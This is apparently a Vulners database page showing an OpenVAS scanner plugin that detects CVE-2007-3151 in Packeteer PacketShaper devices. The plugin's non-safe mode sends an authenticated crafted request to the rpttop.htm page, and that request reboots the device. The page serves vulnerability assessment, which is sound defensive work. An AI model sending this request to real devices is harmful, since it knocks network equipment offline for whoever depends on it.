Lucene search
+L

Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151)

🗓️ 24 Oct 2008 00:00:00Reported by Copyright (C) 2008 nnposterType 
openvas
 openvas
🔗 plugins.openvas.org👁 22 Views

Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-3151
11 Jun 200722:00
cve
cvelist
Cvelist
CVE-2007-3151
11 Jun 200722:00
cvelist
exploitdb
Exploit DB
Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service
8 Jun 200700:00
exploitdb
euvd
EUVD
EUVD-2007-3143
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-3151
11 Jun 200722:30
nvd
openvas
OpenVAS
Packeteer PacketShaper Web Denial of Service
24 Oct 200800:00
openvas
nessus
Tenable Nessus
Packeteer PacketShaper Web Management rpttop.htm Crafted Request Remote DoS
26 Jun 200700:00
nessus
prion
Prion
Design/Logic Flaw
11 Jun 200722:30
prion
# SPDX-FileCopyrightText: 2008 nnposter
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.80030");
  script_version("2024-07-23T05:05:30+0000");
  script_tag(name:"last_modification", value:"2024-07-23 05:05:30 +0000 (Tue, 23 Jul 2024)");
  script_tag(name:"creation_date", value:"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2007-3151");
  script_xref(name:"OSVDB", value:"37230");
  script_name("Packeteer PacketShaper Web DoS Vulnerability (CVE-2007-3151)");
  script_family("Web application abuses");
  script_category(ACT_MIXED_ATTACK);
  script_copyright("Copyright (C) 2008 nnposter");
  script_dependencies("packeteer_web_version.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("bluecoat_packetshaper/installed");

  script_tag(name:"summary", value:"Packeteer PacketShaper is susceptible to a denial of service
  vulnerability in the web management interface.");

  script_tag(name:"impact", value:"Requesting a specific URL will cause the device to reboot. The
  user must first log in but even read-only access is sufficient.");

  script_tag(name:"solution", value:"Restrict network access to the device management interfaces.");

  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/470835/30/0/threaded");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/24388");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"Mitigation");

  exit(0);
}

# Notes:
# - Does not work with http_keepalive_send_recv() for some reason.
#   Resorting to http_send_recv()

include("http_func.inc");
include("port_service_func.inc");

if (!get_kb_item("bluecoat_packetshaper/installed"))
  exit(0);

function set_cookie (data,cookie)
{
  local_var EOL,req;
  EOL = '\r\n';
  req = ereg_replace(string:data, pattern:EOL + 'Cookie:[^\r\n]+', replace:"");
  req = ereg_replace(string:req, pattern:EOL + EOL, replace:EOL + cookie + EOL);
  return req;
}

function get_version_snmp ()
{
  local_var sys,match,ver;
  sys = snmp_get_sysdescr(port:161);
  if (!sys) return;
  match = eregmatch(pattern:"^Packeteer PacketShaper ([A-Za-z0-9.]+)", string:sys);
  ver = match[1];
  if (!ver)
    return;
  return ver;
}

port = http_get_port(default:80);
product = get_kb_item("www/" + port + "/packeteer");
if(!product || product != "PacketShaper")
  exit(0);

if (safe_checks()) {

  KNOWN_BROKEN_VERSION = "7.5.1g1";
  version = get_kb_item("www/" + port + "/packeteer/version");
  if (version && version =~ "^([0-6]\.|7\.([0-4]\.|5\.(0|1([a-f]|g0))))") {
    report = string("The vulnerability has not been tested. The assessment is based solely on the device software version, which is ", version, "." );
    security_message(port:port, data:report);
    exit(0);
  }
  exit(99);
}

cookie = get_kb_item("/tmp/http/auth/" + port);
if (!cookie)
  exit(0);

if (http_is_dead(port:port))
  exit(0);

req = http_get(item:"/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=", port:port);
resp = http_send_recv(port:port, data:set_cookie(data:req, cookie:cookie));
if (!http_is_dead(port:port))
  exit(0);

security_message(port:port);
exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2024 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.07337
22